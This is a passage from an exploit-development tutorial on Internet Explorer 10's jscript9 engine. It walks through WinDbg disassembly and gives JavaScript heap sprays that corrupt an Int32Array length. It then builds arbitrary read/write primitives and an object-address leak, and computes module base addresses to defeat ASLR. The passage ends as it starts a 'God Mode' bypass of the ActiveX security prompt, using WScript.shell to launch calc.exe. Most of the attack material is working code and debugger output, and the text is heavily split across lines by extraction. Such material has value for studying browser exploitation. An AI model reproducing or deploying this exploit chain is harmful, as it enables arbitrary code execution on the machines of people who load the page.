6f72bd9b ff751
0          push    dword ptr [ebp+10h]
 
6f72bd9e ff750c          push    dword ptr [ebp+0Ch]
 
6f72bda1 57              push    edi
 
6f72bda2 50              push    eax
 
6f72bda3 e898f7ffff      call    jscript9!Js::TypedArray<int>::TypedArray<int> (6f72b540)
 
6f72bda8 5f              pop     edi
 
6f72bda9 5e              pop     esi
 
6f72bdaa c9              leave
 
6f72bdab c21000          ret     10h
 
We can see that the 
TypedArray<int>
 object is 
24h
 bytes. Note that the object is first allocated and then 
initiali
zed by the constructor.
 
To print a message when an 
Int32Array
 is created, we can put a breakpoint at the end of 
jscript9!Js::TypedArray<int>::NewInstance
, right after the call to 
jscript9!Js::TypedArrayBase::CreateNewInstance
 (see the arrow):
 
jscript9!Js::
TypedArray<int>::NewInstance:
 
6f79aebb 8bff            mov     edi,edi
 
6f79aebd 55              push    ebp
 
6f79aebe 8bec            mov     ebp,esp
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 338 
-
 
6f79aec0 83e4f8          and     esp,0FFFFFFF8h
 
6f79aec3 83ec0c          sub     esp,0Ch
 
6f79aec6 53       
       push    ebx
 
6f79aec7 8b5d08          mov     ebx,dword ptr [ebp+8]
 
6f79aeca 8b4304          mov     eax,dword ptr [ebx+4]
 
6f79aecd 8b4004          mov     eax,dword ptr [eax+4]
 
6f79aed0 8b4804          mov     ecx,dword ptr [eax+4]
 
6f79aed3 56      
        push    esi
 
6f79aed4 57              push    edi
 
6f79aed5 6a00            push    0
 
6f79aed7 51              push    ecx
 
6f79aed8 8b8934020000    mov     ecx,dword ptr [ecx+234h]
 
6f79aede ba00040000      mov     edx,400h
 
6f79aee3 e8b2e7e0ff      ca
ll    jscript9!ThreadContext::ProbeStack (6f5a969a)
 
6f79aee8 8d4510          lea     eax,[ebp+10h]
 
6f79aeeb 50              push    eax
 
6f79aeec 8d7d0c          lea     edi,[ebp+0Ch]
 
6f79aeef 8d742414        lea     esi,[esp+14h]
 
6f79aef3 e8cb93e0ff      c
all    jscript9!Js::ArgumentReader::ArgumentReader (6f5a42c3)
 
6f79aef8 8b4304          mov     eax,dword ptr [ebx+4]
 
6f79aefb 8b4004          mov     eax,dword ptr [eax+4]
 
6f79aefe 6850bd726f      push    offset jscript9!Js::TypedArray<int>::Create (6f72bd
50)
 
6f79af03 6a04            push    4
 
6f79af05 ff7004          push    dword ptr [eax+4]
 
6f79af08 8bc6            mov     eax,esi
 
6f79af0a 50              push    eax
 
6f79af0b e8214b0000      call    jscript9!Js::TypedArrayBase::CreateNewInstance (6f79fa3
1)
 
6f79af10 5f              pop     edi      <
----------------------
 breakpoint here
 
6f79af11 5e              pop     esi
 
6f79af12 5b              pop     ebx
 
6f79af13 8be5            mov     esp,ebp
 
6f79af15 5d              pop     ebp
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 339 
-
 
6f79af16 c3        
      ret
 
Here’s the breakpoint:
 
bp jscript9+20af10 ".printf 
\
"new TypedArray<int>: addr = 0x%p
\
\
n
\
",eax;g"
 
We should also take a look at 
jscript9!Js::JavascriptArrayBuffer::Create
:
 
0:004> uf jscript9!Js::JavascriptArrayBuffer::Create
 
jscript9!Js::Javascri
ptArrayBuffer::Create:
 
6f643cbe 8bff            mov     edi,edi
 
6f643cc0 55              push    ebp
 
6f643cc1 8bec            mov     ebp,esp
 
6f643cc3 53              push    ebx
 
6f643cc4 8b5d08          mov     ebx,dword ptr [ebp+8]
 
6f643cc7 56           
   push    esi
 
6f643cc8 57              push    edi
 
6f643cc9 8bf8            mov     edi,eax
 
6f643ccb 8b4304          mov     eax,dword ptr [ebx+4]
 
6f643cce 8b4004          mov     eax,dword ptr [eax+4]
 
6f643cd1 8bb064040000    mov     esi,dword ptr [eax+4
64h]
 
6f643cd7 01be04410000    add     dword ptr [esi+4104h],edi
 
6f643cdd e85936f5ff      call    jscript9!Recycler::CollectNow<402722819> (6f59733b)
 
6f643ce2 6a18            push    18h     <
-----------
 18h bytes
 
6f643ce4 8bce            mov     ecx,esi
 
6f
643ce6 e8b958f5ff      call    jscript9!Recycler::AllocFinalized (6f5995a4)
 
6f643ceb ff353cb1826f    push    dword ptr [jscript9!_imp__malloc (6f82b13c)]   <
--------------------
 
6f643cf1 8bf0            mov     esi,eax
 
6f643cf3 8bcb            mov     ecx,
ebx
 
6f643cf5 e863010000      call    jscript9!Js::ArrayBuffer::ArrayBuffer<void * (__cdecl*)(unsigned int)> (6f643e5d)
 
6f643cfa 5f              pop     edi
 
6f643cfb c706103d646f    mov     dword ptr [esi],offset jscript9!Js::JavascriptArrayBuffer::`vftable
' (6f643d10)
 
6f643d01 8bc6            mov     eax,esi
 
6f643d03 5e              pop     esi
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 340 
-
 
6f643d04 5b              pop     ebx
 
6f643d05 5d              pop     ebp
 
6f643d06 c20400          ret     4    <
-----------
 put a breakpoint here
 
As you can see, an
 
ArrayBuffer
 is an object of 
18h
 bytes which is allocated through 
jscript9!Recycler::AllocFinalized
. It’s almost certain that 
ArrayBuffer
 contains a pointer to a block of memory 
which contains the user data. In fact, you can see that 
jscript9!_imp__malloc
 
is passed to the constructor of 
ArrayBuffer
 and we already know that the raw buffer is indeed allocated with C’s 
malloc
.
 
We can now put a breakpoint at then end of the function:
 
bp jscript9!Js::JavascriptArrayBuffer::Create+0x48 ".printf 
\
"new JavascriptAr
rayBuffer: addr = 0x%p
\
\
n
\
",eax;g"
 
These objects are easy to analyze. Here’s what we learned:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 341 
-
 
 
IE10: From one
-
byte
-
write to full process space 
read/write
 
 
As we said before, if we can modify a single byte at an arbitrary address, we can get read/write access to 
the entire process address space. The trick is to modify the length field of an array (or similar data structure) 
so that we can read and write
 beyond the end of the array in normal javascript code.
 
We need to perform two 
heap sprays
:
 
1
.
 
LargeHeapBlocks
 and a raw buffer (associated with an 
ArrayBuffer
) on the heap.
 
2
.
 
Arrays
 and 
Int32Arrays
 allocated on IE’s custom heap.
 
Here’s the relevant javascript 
code:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
(
function
()
 
{
 
    
alert
(
"Starting!"
);
 
 
//
-----------------------------------------------------
 
    
// From one
-
byte
-
write to full process space read/write
 
    
//
------------------------------
-----------------------
 
    
a
 
=
 
new
 
Array
();
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
// 8
-
byte header | 0x58
-
byte LargeHe
apBlock
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf)
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
for
 
(
i
 
=
 
0
;
 
i
 
<
 
0x200
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3c00
);
 
      
if
 
(
i
 
==
 
0x80
)
 
        
buf
 
=
 
new
 
ArrayBuffer
(
0x58
)
;
      
// must be exactly 0x58!
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
0x123
;
 
    
}
 
    
//    0x0:  ArrayDataHead
 
    
//   0x20:  array[0] address
 
    
//   0x24:  array[1] address
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 342 
-
 
    
//   ...
 
    
// 0xf000:  Int32Array
 
    
// 0xf03
0:  Int32Array
 
    
//   ...
 
    
// 0xffc0:  Int32Array
 
    
// 0xfff0:  align data
 
    
for
 
(;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3bf8
)
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
new
 
Int32Array
(
buf
)
 
    
}
 
    
//            vftptr
 
    
// 0c0af000: 70583b60 031c98a0 00000000 00000003 00000004 00000000 20000016 08ce0020
 
    
// 0c0af020: 03133de0                                             array_len buf_addr
 
    
//          jsArrayBuf
 
    
alert
(
"Set byte at 0c0af01b to 0x20"
);
 
    
alert
(
"All done!"
);
 
  
})();
 
 
</script>
 
</head>
 
<body>
 
</body>
 
</
 
 
The two heap sprays are illustrated in the following picture:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 343 
-
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 344 
-
 
 
There are a few important things to know. The goal of the first heap spray is to put a buffer (associated with 
an 
ArrayBuffer
) between 
LargeHeapBlocks
. 
LargeHeapBlocks
 and buffers are allocated on the same heap, 
so if they have the same size they’re likel
y to be put one against the other in memory. Since a 
LargeHeapBlock
 is 
0x58
 bytes, the buffer must also be 
0x58
 bytes.
 
The objects of the second heap spray are allocated on a custom heap. This means that even if we wanted to 
we couldn’t place, say, an 
Arra
y
 adjacent to a 
LargeHeapBlock
.
 
The 
Int32Arrays
 of the second heap spray reference the 
ArrayBuffer
 
buf
 which is associated which the raw 
buffer allocated in the first heap spray. In the second heap spray we allocate 
0x400
 chunks of 
0x10000
 
bytes. In fact, 
for each chunk we allocate:
 

 
an 
Array
 of length 
0x3bf8
 ==> 
0x3bf8*4
 bytes + 
0x20
 bytes for the header = 
0xf000
 bytes
 

 
0x55
 
Int32Arrays
 for a total of 
0x30*0x55
 = 
0xff0
.
 
We saw that an 
Int32Array
 is 
0x24
 bytes, but it’s allocated in blocks of 
0x30
 bytes so it
s effective size is 
0x30
 bytes.
 
As we were saying, a chunk contains an 
Array
 and 
0x55
 
Int32Arrays
 for a total of 
0xf000 + 0xff0
 = 
0xfff0
 
bytes. It turns out that 
Arrays
 are aligned in memory, so the missing 
0x10
 bytes are not used and each 
chunk is 
0x10000
 bytes.
 
The javascript code ends with
 
JavaScript
 
 
alert("Set byte at 0c0af01b to 0x20");
 
 
First of all, let’s have a look at the memory with 
VMMap
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 345 
-
 
 
As you can see, 
0xc0af01b
 is well inside our heap spray (the second one). Let’s have a look at the memory 
inside WinDbg. First, let’s look at the address 
0xc0a0000
 where we should find an 
Array
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 346 
-
 
 
Note that the second heap spray is not exactly as we would expect. Let’s look at the code again:
 
JavaScript
 
 
for
 
(;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3b
f8
)
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
new
 
Int32Array
(
buf
)
 
    
}
 
 
Since in each chunk the 
0x55
 
Int32Arrays
 are allocated right after the 
Array
 and the first 
0x55
 elements of 
that 
Array
 point to the newly allocated 
Int32Arrays
, one would exp
ect that the first element of the 
Array
 
would point to the first 
Int32Array
 allocated right after the 
Array
, but that’s not what happens. The problem is 
that when the second heap spray starts the memory has a bit of 
fragmentation
 so the first 
Arrays
 and 
In
t32Arrays
 are probably allocated in blocks which are partially occupied by other objects.
 
This isn’t a major problem, though. It just means that we need to be careful with our assumptions.
 
Now let’s look at address 
0xc0af000
. There, we should find the firs
t 
Int32Array
 of the chunk:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 347 
-
 
 
The 
Int32Array
 points to a raw buffer at 
429af28
, which is associated with the 
ArrayBuffer
 
buf
 allocate
d on 
the regular heap together with the 
LargeHeapBlocks
. Let’s have a look at it:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 348 
-
 
 
This picture shows a disconcerting situation. Fi
rst of all, the first two 
LargeHeapBlocks
 aren’t adjacent, which 
is a problem because the space between them is pretty random. Second, each 
LargeHeapBlock
 points to 
the next block, contrarily to what we saw before (where each block pointed to the previous 
one).
 
Let’s reload the page in IE and try again:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 349 
-
 
 
The 
LargeHeapBlocks
 point forwards, again. Let’s try another time:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 350 
-
 
 
As you can see, this time we don’t even have the 
Int32Arrays
 at 
0xca0f000
. Let’s try one last time:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 351 
-
 
We can conclude that the 
LargeHeapBlocks
 tend to point forwards. I suspect that the first time they pointed 
backwards because the 
LargeHeapBlocks
 were allocated in reverse or
der, i.e. going towards lower 
addresses.
 
We saw a few ways things may go wrong. How can we cope with that? I came up with the solution of 
reloading the page. We can perform some checks to make sure that everything is alright and, if it isn’t, we 
can reload
 the page this way:
 
JavaScript
 
 
(
function
()
 
{
 
    
.
 
    
.
 
    
.
 
    
if
 
(
check
 
fails
)
 
{
 
      
window
.
location
.
reload
();
 
      
return
;
 
    
}
 
    
})();
 
 
We need to wrap the code into a function so that we can use 
return
 to stop executing the code. This i
s 
needed because 
reload()
 is not instantaneous and something might go wrong before the page is reloaded.
 
As we already said, the javascript code ends with
 
JavaScript
 
 
//            vftptr
 
    
// 0c0af000: 70583b60 031c98a0 00000000 00000003 00000004 00
000000 20000016 08ce0020
 
    
// 0c0af020: 03133de0                                             array_len buf_addr
 
    
//          jsArrayBuf
 
    
alert
(
"Set byte at 0c0af01b to 0x20"
);
 
 
Look at the comments. The field 
array_len
 of the 
Int32Array
 at 
0xc0af00
0
 is initially 
0x16
. After we write 
0x20
 at 
0xc0af01b
, it becomes 
0x20000016
. If the raw buffer is at address 
0x8ce0020
, then we can use the 
Int32Array
 at 
0xc0af000
 to read and write throughout the address space
 [0x8ce0020, 0x8ce0020 + 
0x20000016*4 
–
 4]
.
 
T
o read and write at a given address, we need to know the starting address of the raw buffer, i.e. 
0x8ce0020
 
in the example. We know the address because we used WinDbg, but how can we determine it just with 
javascript?
 
We need to do two things:
 
1
.
 
Determine th
e 
Int32Array
 whose
 array_len
 we modified (i.e. the one at 
0xc0af000
).
 
2
.
 
Find 
buf_addr
 by exploiting the fact that 
LargeHeapBlocks
 point to the next blocks.
 
Here’s the code for the first step:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 352 
-
 
JavaScript
 
 
// Now let's find the Int32Array whose length we m
odified.
 
    
int32array
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
{
 
        
if
 
(
a
[
i
][
j
].
length
 
!=
 
0x58
/
4
)
 
{
 
          
int32array
 
=
 
a
[
i
][
j
];
 
          
break
;
 
        
}
 
      
}
 
      
if
 
(
int32array
 
!=
 
0
)
 
        
brea
k
;
 
    
}
 
    
if
 
(
int32array
 
==
 
0
)
 
{
 
      
alert
(
"Can't find int32array!"
);
 
      
window
.
location
.
reload
();
 
      
return
;
 
    
}
 
 
You shouldn’t have problems understanding the code. Simply put, the modified 
Int32Array
 is the one with a 
length different 
from the original 
0x58/4 = 0x16
. Note that if we don’t find the 
Int32Array
, we reload the page 
because something must have gone wrong.
 
Remember that the first element of the 
Array
 at 
0xc0a0000
 doesn’t necessarily points to the 
Int32Array
 at 
0xc0af000
, so w
e must check all the 
Int32Arrays
.
 
It should be said that it’s not obvious that by modifying the 
array_len
 field of an 
Int32Array
 we can read/write 
beyond the end of the raw buffer. In fact, an 
Int32Array
 also points to an 
ArrayBuffer
 which contains the rea
l 
length of the raw buffer. So, we’re just lucky that we don’t have to modify both lengths.
 
Now it’s time to tackle the second step:
 
JavaScript
 
 
// This is just an example.
 
    
// The buffer of int32array starts at 03c1f178 and is 0x58 bytes.
 
    
// Th
e next LargeHeapBlock, preceded by 8 bytes of header, starts at 03c1f1d8.
 
    
// The value in parentheses, at 03c1f178+0x60+0x24, points to the following
 
    
// LargeHeapBlock.
 
    
//
 
    
// 03c1f178: 00000000 00000000 00000000 00000000 00000000 00000000 0
0000000 00000000
 
    
// 03c1f198: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
 
    
// 03c1f1b8: 00000000 00000000 00000000 00000000 00000000 00000000 014829e8 8c000000
 
    
// 03c1f1d8: 70796e18 00000003 08100000 00000010 00000001
 00000000 00000004 0810f020
 
    
// 03c1f1f8: 08110000(03c1f238)00000000 00000001 00000001 00000000 03c15b40 08100000
 
    
// 03c1f218: 00000000 00000000 00000000 00000004 00000001 00000000 01482994 8c000000
 
    
// 03c1f238: ...
 
 
// We check that the st
ructure above is correct (we check the first LargeHeapBlocks).
 
    
// 70796e18 = jscript9!LargeHeapBlock::`vftable' = jscript9 + 0x6e18
 
    
var
 
vftptr1
 
=
 
int32array
[
0x60
/
4
],
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 353 
-
 
        
vftptr2
 
=
 
int32array
[
0x60
*
2
/
4
],
 
        
vftptr3
 
=
 
int32array
[
0x60
*
3
/
4
],
 
  
nextPtr1
 
=
 
int32array
[(
0x60
+
0x24
)/
4
],
 
        
nextPtr2
 
=
 
int32array
[(
0x60
*
2
+
0x24
)/
4
],
 
        
nextPtr3
 
=
 
int32array
[(
0x60
*
3
+
0x24
)/
4
];
 
    
if
 
(
vftptr1
 
&
 
0xffff
 
!=
 
0x6e18
 
||
 
vftptr1
 
!=
 
vftptr2
 
||
 
vftptr2
 
!=
 
vftptr3
 
||
 
        
nextPtr2
 
-
 
nextPtr1
 
!=
 
0x6
0
 
||
 
nextPtr3
 
-
 
nextPtr2
 
!=
 
0x60
)
 
{
 
      
alert
(
"Error!"
);
 
      
window
.
location
.
reload
();
 
      
return
;
 
    
}
  
 
buf_addr
 
=
 
nextPtr1
 
-
 
0x60
*
2
;
 
 
Remember that 
int32array
 is the modified 
Int32Array
 at 
0xc0af000
. We read the vftable pointers and the 
forward
 pointers of the first 3 
LargeHeapBlocks
. If everything is OK, the vftable pointers are of the form 
0xXXXX6e18
 and the 
forward
 pointers differ by 
0x60
, which is the size of a 
LargeHeapBlock
 plus the 
8
-
byte 
allocation header. The next picture should 
help clarify things further:
 
 
Now that 
buf_addr
 contains the starting address of the raw buffer, we can read and write everywhere i
n
 
[buf_addr, buf_addr + 0x20000016*4]
. To have access to the whole address space, we need to modify the 
Int32Array
 at 
0xc0af000
 again. Here’s how:
 
JavaScript
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 354 
-
 
    
// Now we modify int32array again to gain full address space read/write access.
 
    
if
 
(
int32
array
[(
0x0c0af000
+
0x1c
 
-
 
buf_addr
)/
4
]
 
!=
 
buf_addr
)
 
{
 
      
alert
(
"Error!"
);
 
      
window
.
location
.
reload
();
 
      
return
;
 
    
}
  
 
int32array
[(
0x0c0af000
+
0x18
 
-
 
buf_addr
)/
4
]
 
=
 
0x20000000
;
        
// new length
 
    
int32array
[(
0x0c0af000
+
0x1c
 
-
 
buf_addr
)/
4
]
 
=
 
0
;
                 
// new buffer address
 
    
function
 
read
(
address
)
 
{
 
      
var
 
k
 
=
 
address
 
&
 
3
;
 
      
if
 
(
k
 
==
 
0
)
 
{
 
        
// ####
 
        
return
 
int32array
[
address
/
4
];
 
      
}
 
      
else
 
{
 
        
alert
(
"to debug"
);
 
        
// .### #... or ..## ##.
. or ...# ###.
 
        
return
 
(
int32array
[(
address
-
k
)/
4
]
 
>>
 
k
*
8
)
 
|
 
               
(
int32array
[(
address
-
k
+
4
)/
4
]
 
<<
 
(
32
 
-
 
k
*
8
));
 
      
}
 
    
}
 
    
function
 
write
(
address
,
 
value
)
 
{
 
      
var
 
k
 
=
 
address
 
&
 
3
;
 
      
if
 
(
k
 
==
 
0
)
 
{
 
        
// ####
 
        
in
t32array
[
address
/
4
]
 
=
 
value
;
 
      
}
 
      
else
 
{
 
        
// .### #... or ..## ##.. or ...# ###.
 
        
alert
(
"to debug"
);
 
        
var
 
low
 
=
 
int32array
[(
address
-
k
)/
4
];
 
        
var
 
high
 
=
 
int32array
[(
address
-
k
+
4
)/
4
];
 
        
var
 
mask
 
=
 
(
1
 
<<
 
k
*
8
)
 
-
 
1
;
  
// 
0xff or 0xffff or 0xffffff
 
        
low
 
=
 
(
low
 
&
 
mask
)
 
|
 
(
value
 
<<
 
k
*
8
);
 
        
high
 
=
 
(
high
 
&
 
(
0xffffffff
 
-
 
mask
))
 
|
 
(
value
 
>>
 
(
32
 
-
 
k
*
8
));
 
        
int32array
[(
address
-
k
)/
4
]
 
=
 
low
;
 
        
int32array
[(
address
-
k
+
4
)/
4
]
 
=
 
high
;
 
      
}
 
    
Let’s look at th
e comments again:
 
JavaScript
 
 
//            vftptr
 
    
// 0c0af000: 70583b60 031c98a0 00000000 00000003 00000004 00000000 20000016 08ce0020
 
    
// 0c0af020: 03133de0                                             array_len buf_addr
 
    
//          jsArray
Buf
 
 
In the code above we set 
array_len
 to 
0x20000000
 and 
buf_addr
 to 
0
. Now we can read/write throughout 
[0, 
20000000*4]
.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 355 
-
 
Note that the part of 
read()
 and 
write()
 that’s supposed to handle the case when address is not a multiple of 
4
 was never tested, bec
ause it wasn’t needed after all.
 
Leaking the address of an object
 
We need to be able to determine the address of an object in javascript. Here’s the code:
 
JavaScript
 
 
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
      
a
[
i
][
0x3bf7
]
 
=
 
0
;
 
    
// We write 
3 in the last position of one of our arrays. IE encodes the number x
 
    
// as 2*x+1 so that it can tell addresses (dword aligned) and numbers apart.
 
    
// Either we use an odd number or a valid address otherwise IE will crash in the
 
    
// following for 
loop.
 
    
write
(
0x0c0af000
-
4
,
 
3
);
 
    
leakArray
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
      
if
 
(
a
[
i
][
0x3bf7
]
 
!=
 
0
)
 
{
 
        
leakArray
 
=
 
a
[
i
];
 
        
break
;
 
      
}
 
    
}
 
    
if
 
(
leakArray
 
==
 
0
)
 
{
 
      
alert
(
"Can't find leakArray!"
);
 
      
w
indow
.
location
.
reload
();
 
      
return
;
 
    
}
 
    
function
 
get_addr
(
obj
)
 
{
 
      
leakArray
[
0x3bf7
]
 
=
 
obj
;
 
      
return
 
read
(
0x0c0af000
-
4
);
 
    
}
 
 
We want to find the 
Array
 at 
0xc0a0000
. We proceed like this:
 
1
.
 
We zero out the last element of every 
Array
 
(
a[0x3bf7] = 0
).
 
2
.
 
We write 
3
 at 
0xc0af000
-
4
, i.e. we assign 
3
 to the last element of the 
Array
 at 
0xc0a0000
.
 
3
.
 
We find the 
Array
 whose last element is not zero, i.e. the 
Array
 at 
0xc0a0000
 and make 
leakArray
 
point to it.
 
4
.
 
We define function 
get_addr()
 which:
 
a
.
 
t
akes a reference, 
obj
, to an object
 
b
.
 
writes 
obj
 to the last element of 
leakArray
 
c
.
 
reads 
obj
 back by using 
read()
, which reveals the real value of the pointer
 
The function 
get_addr
 is very important because lets us determine the real address in memory of the 
objects 
we create in javascript. Now we can determine the base address of 
jscript9.dll
 and 
mshtml.dll
 as follows:
 
JavaScript
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 356 
-
 
    
// At 0c0af000 we can read the vfptr of an Int32Array:
 
    
//   jscript9!Js::TypedArray<int>::`vftable' @ jscript9+3b60
 
    
js
cript9
 
=
 
read
(
0x0c0af000
)
 
-
 
0x3b60
;
 
    
.
 
    
.
 
    
.
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!Projection::ArrayObjectInstance::`vftable'
 
    
//      v
 
    
//   70792248 0c012b40 00000000 00000003
 
    
//   73b38b9a 000000
00 00574230 00000000
 
    
//      ^
 
    
//      +
----
 MSHTML!CBaseTypeOperations::CBaseFinalizer = mshtml + 0x58b9a
 
    
var
 
addr
 
=
 
get_addr
(
document
.
createElement
(
"div"
));
 
    
mshtml
 
=
 
read
(
addr
 
+
 
0x10
)
 
-
 
0x58b9a
;
 
 
The code above is very simple. We know tha
t at 
0xc0af000
 we have an 
Int32Array
 and that its first dword is 
the vftable pointer. Since the vftable of a 
TypedArray<int>
 is in the module 
jscript9.dll
 and is at a fixed 
RVA
, 
we can easily compute the base address of 
jscript9
 by subtracting the RVA of t
he vftable from its actual 
address.
 
Then we create a 
div
 element, leak its address and note that at offset 
0x10
 we can find a pointer to 
MSHTML!CBaseTypeOperations::CBaseFinalizer
, which can be expressed as
 
mshtml + RVA = mshtml + 0x58b9a
 
As before, we can
 determine the base address of 
mshtml.dll
 with a simple subtraction.
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 357 
-
 
IE10: God Mode (1)
 
 
When an 
html page tries to load and run an 
ActiveX
 object in IE, the user is alerted with a 
dialog box
. For 
instance, create an html file with the following code:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
  
s
hell.Exec
(
'calc.exe'
);
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
If you open this file in IE, you should get the following dialog box:
 
 
If we activate the so
-
called 
God Mode
, IE runs the ActiveX object without asking for the user’s permission. 
Basically, we’ll just use our ability to read and write where we want to alter the behavior of IE.
 
But what’s so interesting in popping up a ca
lculator? That’s a valid demonstration for general shellcode 
because it proves that we can run arbitrary code, but here we’ve just proved that we can execute any 
program which resides on the user’s hard disk. We’d like to execute arbitrary code, instead.
 
O
ne solution is to create an 
.exe
 file containing code and data of our choosing and then execute it. But for 
now, let’s try to bypass the dialog box when executing the code above.
 
Bypassing the dialog box
 
The dialog box displayed when the code above is run 
looks like a regular Windows dialog box, so it’s likely 
that IE uses the 
Windows API
 to create it. Let’s search for 
msdn dialog box
 with 
google
. The first result is 
this link:
 
https://msdn.microsoft.com/en
-
us/library/windows/desktop/ms645452%28v=vs.85%29.aspx
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 358 
-
 
As you can see in the following picture, there are a few functions used to create dialog boxes:
 
 
By reading the 
Remarks 
section we discover that 
DialogBox
 calls 
CreateWindowEx
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 359 
-
 
 
When we look at the other functions used to create dialog boxes, we find out that they also call 
CreateWindowEx
, so we should put a breakpoint on 
CreateWindowEx
.
 
First of all, we load the html page above in IE and, before allowing the b
locked content (IE asks for a 
confirmation when you open local html files), we put a breakpoint on 
CreateWindowEx
 (both the 
ASCII
 and 
the 
Unicode
 version) in WinDbg:
 
  
0:016> bp createwindowexw
 
  0:016> bp createwindowexa
 
Then, when we allow the blocked co
ntent, the breakpoint on 
CreateWindowExW
 is triggered. Here’s the 
stack trace:
 
0:007> k 20
 
ChildEBP RetAddr  
 
042bae7c 738d4467 user32!CreateWindowExW
 
042baebc 6eeee9fa IEShims!NS_HangResistanceInternal::APIHook_CreateWindowExW+0x64
 
042baefc 6efb9759 IEFRA
ME!SHFusionCreateWindowEx+0x47
 
042bb058 6efb951e IEFRAME!CBrowserFrameState::FindTabIDFromRootThreadID+0x13b
 
042bb0a4 6efb9409 IEFRAME!UnifiedFrameAware_AcquireModalDialogLockAndParent+0xe9
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 360 
-
 
042bb0c4 738e8c5c IEFRAME!TabWindowExports::AcquireModalDialogLock
AndParent+0x1b
 
042bb0e0 74e7f0c8 IEShims!NS_UISuppression::APIHook_DialogBoxParamW+0x31
 
042bb910 74e9efe0 urlmon!CSecurityManager::DisplayMessage+0x40
 
042bbcb4 74dff5d4 urlmon!memset+0x120a0
 
042bbcf8 6e2a84dc urlmon!CSecurityManager::ProcessUrlActionEx2+0x
15f
 
042bbd6c 6e2a81ae MSHTML!CMarkup::ProcessURLAction2+0x31d
 
042bbd9c 6ecf7868 MSHTML!CMarkup::ProcessURLAction+0x3e
 
042bbe28 6e24d87d MSHTML!memcpy+0x120f00
 
042bbe6c 04d5c12d MSHTML!CDocument::HostQueryCustomPolicy+0x148
 
042bbee4 04d5bfae jscript9!Script
Engine::CanObjectRun+0x78   <
--------------------
 
042bbf30 04d5bde1 jscript9!ScriptSite::CreateObjectFromProgID+0xdf   <
--------------------
 
042bbf74 04d5bd69 jscript9!ScriptSite::CreateActiveXObject+0x56   <
--------------------
 
042bbfa8 04cc25d5 jscript9!
JavascriptActiveXObject::NewInstance+0x90
 
042bc000 04cc272e jscript9!Js::InterpreterStackFrame::NewScObject_Helper+0xd6
 
